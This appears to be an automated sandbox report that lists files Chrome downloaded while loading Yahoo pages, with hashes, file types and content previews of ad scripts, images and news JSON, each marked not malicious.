                                                                                                                                                                                                                  SHA-512:029FDDCBD993E68E25B470D316CC94EF513AC536AB70C39F5B6920B6BEF6398F3BF77DD5F6067441337068566F1DCF408CDEC28DC22E03256E634AF644322875
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-fetch",[],t):"object"==typeof exports?exports["wafer-fetch"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-fetch"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){var r={};for(var n in e)t.indexOf(n)>=0||Object.prototype.hasOwnProperty.call(e,n)&&(
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5406), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):5406
                                                                                                                                                                                                                  Entropy (8bit):5.6072870757845585
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D3A923E9DF6329348AB4FA18BA16533C
                                                                                                                                                                                                                  SHA1:C22F2B5CFFD5A9DA8689A41C301F54B00FA711C4
                                                                                                                                                                                                                  SHA-256:8C8F9589C5FE3C2A49D5591157CC4F6A7FAFCC5ECD2BF6D3571B18E6B7904FA1
                                                                                                                                                                                                                  SHA-512:D96850F44C9010ECE624C05C087E076CFFF0B5F5BB916EC3C2EC68A03CE60A5F5D878D717EA37B8A22382B593DC0777FE252410D0955B32776FF1160730EB00B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://image6.pubmatic.com/AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=33650160&p=137711&s=137812&a=0&ptask=ALL&np=0&fp=0&rp=0&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                  Preview:PubMatic.loadAsyncImagePixel('https://sync.crwdcntrl.net/qmap?c=240&tp=PUBM&tpid=833930F6-1D46-4D29-BD94-31974E2C647C&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cr.frontend.weborama.fr/cr?key=pubmatic&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://mwzeom.zeotap.com/mw?zpartnerid=1384&env=mWeb&gdpr=0&gdpr_consent=&cid=833930F6-1D46-4D29-BD94-31974E2C647C');PubMatic.loadAsyncImagePixel('https://uipglob.semasio.net/pubmatic/1/info?sType=sync&sExtCookieId=833930F6-1D46-4D29-BD94-31974E2C647C&sInitiator=external&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cm.g.doubleclick.net/pixel?google_nid=pubmatic&google_hm=ODMzOTMwRjYtMUQ0Ni00RDI5LUJEOTQtMzE5NzRFMkM2NDdD&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cm.g.doubleclick.net/pixel?google_nid=pmeb&google_sc=1&google_hm=gzkw9h1GTSm9lDGXTixkfA%3D%3D&gdpr=0&gdpr_consent=');PubMatic.loadAsyncImagePixel('https://cm.g.doubleclick.net/pixel?google_nid=pubmatic&google_cm&google_sc&gdpr=
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, progressive, precision 8, 300x250, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):35933
                                                                                                                                                                                                                  Entropy (8bit):7.9459823662148015
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:90AF20F9182B77F23627419FB4C51FEF
                                                                                                                                                                                                                  SHA1:DEDC1306A272C4E3B67702F6F0F146A9FED400E0
                                                                                                                                                                                                                  SHA-256:11B950B09F3A0B374C2B889EFB424071CFF3C6B17E7BB26FDB3FDB8014D21C0E
                                                                                                                                                                                                                  SHA-512:848FAA696DE805E84C4BC75C5B550FC999E0D174C25E71DA188F63DDC4EDB453CBB89DF144061A17741FA9808CFCEC3094408AB8A8B10800AA199B80A2231D05
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/cv/apiv2/default/20181213/Finance_Brand_Filler__300x250_Look_1.jpg
                                                                                                                                                                                                                  Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                  Entropy (8bit):3.625
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:5CD6E5A6E670FE5B4A9C6BB6E30181A2
                                                                                                                                                                                                                  SHA1:303A23B65CC6675EED483BE7E8426B3B64013FD4
                                                                                                                                                                                                                  SHA-256:4C1E7CA98E56A457702DF54B05786DDB19A3D43CD5CA652BE6944758741CBA67
                                                                                                                                                                                                                  SHA-512:0CEB4499D15A36A0F5EB0D165DB07D7DCCACA0CF69401315376B94D02C4D7FABA69119C31F95559D9C946E397B8500B22BE1BE3E2F24F95DB4FEBA440F21A57F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlUi7xLfpsp0hIFDejd-wA=?alt=proto
                                                                                                                                                                                                                  Preview:CgkKBw3o3fsAGgA=
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):157858
                                                                                                                                                                                                                  Entropy (8bit):5.4824131947661625
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:25AD644BCBFF6D1ED4EE047E5FE05313
                                                                                                                                                                                                                  SHA1:79A24DD2B2B94B3B2848373A1DC17C5F681142E3
                                                                                                                                                                                                                  SHA-256:F5F13439273208FA41DCA352546AB23096FE1D8E82CE348CE02E7ED18861F48D
                                                                                                                                                                                                                  SHA-512:B0701C7747C3BBF967D5C27293B3DAFEB94088321421A05DC9AC4EF4017250600807C84828EF15D02DACE197B37917D945BE4EE18B004028AF7CD7D29492D858
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:!function(){var t,e,n,r,i=(t="function"==typeof Uint16Array?function(t){return new Uint16Array(t)}:function(t){return new Array(t)},e=function(t){return t.replace(/[wxyz'"\\\%]/g,(function(t){return{w:"'",x:'"',y:"%",z:"\\","'":"w",'"':"x","%":"y","\\":"z"}[t]}))},n=function(t,e,n){var r,i,o,a=[0,0,0,0,0];for(r=0;r<e;r+=2){for(o=(t[r]<<16>>>0)+t[r+1]>>>0,i=0;i<5;++i)a[i]=o%85+33,o=o/85>>>0;n.push(String.fromCharCode(a[4],a[3],a[2],a[1],a[0]))}},{encode:function(t){var r=[],i=t.length%2,o=t.length-i;if(n(t,o,r),i){n([t[o],0],2,r);var a=r.pop();r.push(a.substr(0,i+2))}return e(r.join(""))},decode:function(n){var r,i,o,a,s,c=(n=e(n)).length,u=[0,0,0,0,0],f=t(2*Math.ceil(c/5));for(s=r=0;r<c;r+=5){for(i=0;i<5;++i)u[i]=n.charCodeAt(r+i)-33;if((a=c-r)<5){for(i=a;i<5;++i)u[i]=0;u[a]=85}o=85*(85*(85*(85*u[0]+u[1])+u[2])+u[3])+u[4],f[s++]=o>>>16,f[s++]=65535&o}return c%5&&(f instanceof Array?f.pop():f=f.subarray(0,f.length-1)),f}}),o=function(){function t(){}return t.wg=function(){},t.ns=functio
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):180
                                                                                                                                                                                                                  Entropy (8bit):4.9395450763758575
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:D156B541C028FE7D3167B101D15500F6
                                                                                                                                                                                                                  SHA1:4CFD74A00BE521BF8179D56B3AD6348DDABB2876
                                                                                                                                                                                                                  SHA-256:AA02D2FD7FA18DFBB59B4E27C0D8CA3B0EA1A1DB2EB4677FC13758A6DB9CEEB4
                                                                                                                                                                                                                  SHA-512:0F5FEC8B53FB278A1C23C67296FC132E0F2107ABBC06CD27D9247E293527904772F5D6A0DBD5F0A43990B99385EA5C43781E3A2E1F2F66BB09C9139085A62EFA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css
                                                                                                                                                                                                                  Preview:#atomic .Bgc\(--white\){background-color:#fff;background-color:var(--white)}#atomic .Ov\(h\){overflow:hidden}#atomic .Pt\(2px\){padding-top:2px}#atomic .Pos\(r\){position:relative}
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (35505), with no line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):35505
                                                                                                                                                                                                                  Entropy (8bit):5.227715216344498
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:4636CB14C3D8D1EBA5BB4DA2CFCF18AA
                                                                                                                                                                                                                  SHA1:68615EE696008A4B9ADB0E7BC7A2A4DD4FA4F41F
                                                                                                                                                                                                                  SHA-256:A02F925DF2E7879D16ACE7355007AA590813CE71082466242C75F668AF18A668
                                                                                                                                                                                                                  SHA-512:7B81E4FBF1033AB76444319DBF120198075A10655CE4C763EB2A54AF0E24F52B572DF34E05C59D3C01BB6AA9236F5FB981261565B79AF9178FEB5ED60D522252
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/aaq/wf/wf-scrollview-2.23.3-modern.js
                                                                                                                                                                                                                  Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-scrollview",[],t):"object"==typeof exports?exports["wafer-scrollview"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-scrollview"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(s){if(i[s])return i[s].exports;var r=i[s]={i:s,l:!1,exports:{}};return e[s].call(r.exports,r,r.exports,t),r.l=!0,r.exports}var i={};return t.m=e,t.c=i,t.d=function(e,i,s){t.o(e,i)||Object.defineProperty(e,i,{configurable:!1,enumerable:!0,get:s})},t.n=function(e){var i=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(i,"a",i),i},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,i){"use strict";function s(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a fun
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                  Entropy (8bit):7.951369006034756
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:87D5B2DAEB9ABB067E4908BC753CB2CE
                                                                                                                                                                                                                  SHA1:7B424F021451CAE42540B20679E74EB32F69BB21
                                                                                                                                                                                                                  SHA-256:D48147671D931F839837913D42925C917495235B25E2FEA39F695FBE9D58FDD7
                                                                                                                                                                                                                  SHA-512:D9CA60000E268B96B82C4991A6E03D1F2DA10DDFE6EE9B92DC09879D4906887C843382600D0C54F9C93DB9D63DB008CBDACDBD3A23BEF59D877D37C1795B93AD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_179%2Cw_340%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A//cdn.taboola.com/libtrc/static/thumbnails/24b759638a52f9bf1bb4ca2e7077fd4d.png
                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X........S.....VP8 .........*T...>.@.I%...(3]....em.$..=?=.c........l^.>..:}..G...}l......=E<u....y.....g...r.z.....H.R=da..Du/DwI/.D.eM...p2...n....8XQ.....'..PD..3[>.pPq.....A...s ...%.j.A..u#....1P*.s.q...oL&7...+'..z........&.f......3.h.s[ zb.p..c..f.@7..1........7.....gN..4.....v4...9...'..R..28?.9y.\.. A.)^<.r...Zx......}..>.Q..$d..b3..%mm...z%.>.H..'.,.......T\..Je....u../<m-...z.'}...Aj.g.a[...2;..>s....7....@.Ub..c.........4..^.z!(A.%L...Z.../.....FW..Vn.n...9.zI................$.."...lO8...n.......Z.y$..Q.......S..R&..w..!...M..H...6.s.hC...?.w.Mp..Z4(C6...@]#1..$.<....A.....'..x(.....[1]....w..E.o....Z...!........j@.s.l.@.4..MT...jsM.*>...fH.-.?..[..".......T..p..._h.........*..=;.Z?oR...fU...?..^k.NqL..)..@......Y..r..n...a^..,P..@............/=B....7.|.1.<&.!....\.S...O?...X.C*.Qb.........9.Y.,....,.Z*..k..j.z....|.5..&..........L...4!.uHn....0....2...B}r.#..4}.f.......(.%... ...[.t.....B_..[t...L...p3.U..\.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Lavc60.3.100", baseline, precision 8, 480x270, components 3
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):11649
                                                                                                                                                                                                                  Entropy (8bit):7.921390986674188
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:CD794C32011AD4629044EB5358AD8DFD
                                                                                                                                                                                                                  SHA1:C7564BAA67C7D6E6E9B4D9F4417C7A4170262022
                                                                                                                                                                                                                  SHA-256:94DF1453E0ED92009F2C9FB259C9668BB10D8C33D2323038FD15BD22CFEAA2F9
                                                                                                                                                                                                                  SHA-512:5BD80427F2F72AE7C418FB3DB6F3DCE2A44073E3360DF4A51F15AD9BBC66AC47702C7B14EC86F6D28638E30D8BBDD43AF53A1DF3294196A91BFF554FDE155868
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://bcbolt446c5271-a.akamaihd.net/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/35s/match/image.jpeg?akamai_token=exp=1728066590~acl=/image/v1/jit/6415665815001/21e3598b-3a08-4613-89a8-12973d38e2e0/main/480x270/35s/match/image.jpeg*~hmac=0995a7ad02571c72bfaf72524d0d039f1f9b3fced810a40a714b1060e7c8d063
                                                                                                                                                                                                                  Preview:......JFIF..............Lavc60.3.100...C........................... ."" ...$(4,$&1'..-=-157:::#+?D?8C49:7...C...........7%.%77777777777777777777777777777777777777777777777777..........."........................................@.........................!1..AQ"Raq.2...B..#3Sb.4C...$6r...Dt...............................%........................!1.A.Q."2a.............?..j..............................................................................................................................................................<.=U.=g..5,S.#7.......:.X...3..cZ.VT5..P%p.....D..p&$.-SD.KE.#..w/+O.s.f.k....1f.:J^g'.......`56p:i.....k..;....X..+~........43.ns....;.k....^`..5..u......Ln.C..p..U.Tu5-.....8...v.......cb.....a......77=..6...U....t.muHt...3. ..._...o....G..........@u.....,l...b.}.]D1.....Y..i...mw.?.8...J.. ..B6...)..l....s.ild..X..k..M...92...-..b.#..n..sNRlAQK.U..C..t..ssr...cb.9y...]/b..8.|.2.+jc..3X.\.M.p...".........3.p...qa....X...@!.@!.A....#...+.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):79
                                                                                                                                                                                                                  Entropy (8bit):4.1437125988438455
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:F4EFD6C3FB6FF75C0C266C1967109D39
                                                                                                                                                                                                                  SHA1:AD1B3230DDF4DD734BEFD09DFB793619FDA0961F
                                                                                                                                                                                                                  SHA-256:5A8701497007489A6358A67AFD48C19F7421CC26F286E94388868A48BBE3FEBB
                                                                                                                                                                                                                  SHA-512:9838DF59D1174426B4F5B49B493A52B078FB4A8E33DC5DAE97D61F8AF97261DB6F3F143EC42ABEF2B2CAFC03ADD1D1773ABFD529DF17F2FE0C369A4E4B4076C1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:<html>. <body>. <script src="audio.js"></script>. </body>.</html>.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):30658
                                                                                                                                                                                                                  Entropy (8bit):7.947642073244057
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:637EB8D18C49E45CF98B05A8851D77B7
                                                                                                                                                                                                                  SHA1:747FC2C03CC59794FB0A68B41CAECE9EBF92CD54
                                                                                                                                                                                                                  SHA-256:7C8ED48A4EAF88E0D1F85AD8BD2A4847478C5A4F4B560782E2F19560AA3DC609
                                                                                                                                                                                                                  SHA-512:83842C62F02247B9980B702FE5E72EEB4897BF3F846A86EC7CE1104287D7AE7B2329DF2387ADD9041C394CFA983B08400BA93469FF3CB2194DDDB940A730F8CF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://s.yimg.com/uu/api/res/1.2/wY9JOYmPIv_vNOoxN0nofQ--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-10/7ce6e010-81d4-11ef-b9fe-c5d085385e2c.cf.webp
                                                                                                                                                                                                                  Preview:RIFF.w..WEBPVP8X.... ...c.....ICCP........appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl................................................desc...P...bdscm........cprt.......#wtpt........rXYZ........gXYZ........bXYZ........rTRC........aarg... ... vcgt...@...0ndin...p...>mmod.......(vcgp.......8bTRC........gTRC........aabg... ... aagg... ... desc........Display.................................................................................mluc.......&....hrHR........koKR........nbNO........id..........huHU........csCZ........daDK........nlNL........fiFI........itIT........esES........roRO........frCA........ar..........ukUA........heIL........zhTW........viVN........skSK........zhCN........ruRU........enGB........frFR........ms..........hiIN........thTH........caES........enAU........esXL........deDE........enUS........ptBR........plPL........elGR........svSE........trTR........ptPT........jaJP.........C.o.l.o.r. .L.C.D..text....Copyright Apple Inc., 2024
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):158
                                                                                                                                                                                                                  Entropy (8bit):4.994787172741404
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:CA243B22264DCA7A4A899C51CC2DC963
                                                                                                                                                                                                                  SHA1:CF47310BBB10F981E5735CBCB6196F688782A625
                                                                                                                                                                                                                  SHA-256:95FB5A5390AFDA7B7734B303C9F724039FDA305313CE9517AA5F7A544A208AF0
                                                                                                                                                                                                                  SHA-512:704E626A74A47B560B3316788B46F7CAF94E1E831B9290551C52DBF4D1E8DD8B72BACBBF6164EAA393BD97DABA0C351881B2F9D83A92F3BAAC49322BF9B5040B
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:document.write('<div id="advertisement-thamba" style="display:none">Display Advertisement</div>');/* Copyright (c) 2020, Yahoo! Inc. All rights reserved. */.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19
                                                                                                                                                                                                                  Entropy (8bit):3.4713544870139303
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:34C520D87664032692C4315FFF455D18
                                                                                                                                                                                                                  SHA1:978C8B03E97680EB62057A7000F6E7FD97FB9658
                                                                                                                                                                                                                  SHA-256:C40AA69F0B306CEA296DD1193C334BC0781587ED51AAB579C0433698BA9E0C4B
                                                                                                                                                                                                                  SHA-512:BC6ECF7B39E2C5882C693072A7F541A7C03117A28D14067FED6FDAB6BD455FD8E79C6FE9B81FDF327E64814B91ACEE6F9C1A62134C32CF39731477B712466F38
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:Method Not Allowed.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):263
                                                                                                                                                                                                                  Entropy (8bit):3.7793160680040763
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:A8C562F7944E439CF3D9B7BC11918BC6
                                                                                                                                                                                                                  SHA1:FFE086BF8E875ED95E2937D6A11DC9DD49D63DBF
                                                                                                                                                                                                                  SHA-256:B3F0695E2C36441E0FC2483D2023DC51A893F18060761FB2DAD8D2FCE8BA4733
                                                                                                                                                                                                                  SHA-512:A96D3746E26E3E540F9F52F19CC02E94D9DDB8A533BCB005EEBE370348327B9C367A4501CE27E1DD42003DE0B488039707F0B4551EBF3874C3FDE099193C61B9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:https://securepubads.g.doubleclick.net/pagead/ima_ppub_config?ippd=https%3A%2F%2Fwww.yahoo.com%2F
                                                                                                                                                                                                                  Preview:[null,[[["21783347309"],["22060069514"],["22888152279"],["23328537"],["73074296"]]],[[["21783347309",1],["22060069514",1],["22888152279",0],["23328537",1],["73074296",1]]],[[["21783347309",1],["22060069514",1],["22888152279",1],["23328537",1],["73074296",1]]],[]]
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):95
                                                                                                                                                                                                                  Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                  SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                  SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                  SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):49022
                                                                                                                                                                                                                  Entropy (8bit):5.5108613649237155
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:CC85F3F60655353DC88195DCE2EDE899
                                                                                                                                                                                                                  SHA1:16C640C94C0A7C9347DC66868C91E0D1281D9C5E
                                                                                                                                                                                                                  SHA-256:EFFF0B92E8489737CD29B17CCA4913D01179901F8379809C5AAE1B52F09105C2
                                                                                                                                                                                                                  SHA-512:F0065347D5072AA204274AA4A73B45E80BA092846311ED35140B7BED573A6454350E276F1D05305A6967D76A6AE35742B108076A346C59617F8343A5E0B48436
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                  URL:"https://www.yahoo.com/caas/content/article/?uuid=0c861ab1-6e80-4662-9bda-b1ac18b5e10e&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=TNBE003,USNELT-ReactInRMP-commerce-ctrl-1004,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=64cl5gdjfvvgt"
                                                                                                                                                                                                                  Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"the-yodel;news;celebrities","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a077000000CFoGyAAL;revsp:the_yodel_717;lpstaid:0c861ab1-6e80-4662-9bda-b1ac18b5e10e;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Hurricane_Helene_%281958%29;Hurricane_Katrina;Getty_Images;Abbott_Elementary;Caitlin_Clark;Yahoo;Joaquin_Phoenix;Power_outage;Milwaukee_Brewers;Quinta_Brunson;Israeli_bombing_of_the_Gaza_Strip;Ian_Ziering;Autumn_leaf_color;Rob_McElhenney;New_York_Mets;Entertainment_Weekly\" ctopid=\"1035500;1104500\" hashtag=\"the-yodel;news;1035500;1104500\" rs=\"lmsid:a077000000CFoGyAAL;revsp:the_yodel_717;lpstaid:0c861ab1-6e80-4662-9bda-b1ac18b5e10e;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"news","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=helene-becomes-deadliest-hurricane-since-katrina-irs-expands-free-t
                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):927
                                                                                                                                                                                                                  Entropy (8bit):5.3423008306239845
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:
                                                                                                                                                                                                                  MD5:85A7FD4CD61E805DC14AF19018C4098A
                                                                                                                                                                                                                  SHA1:FFC45A0B1D1C8DAF2E2F66369853F11DF8590E38
                                                                                                                                                                                                                  SHA-256:B36A05E545EBD85CB9408555A48F088CA60156C77AB1534EB9AE8853852C81ED
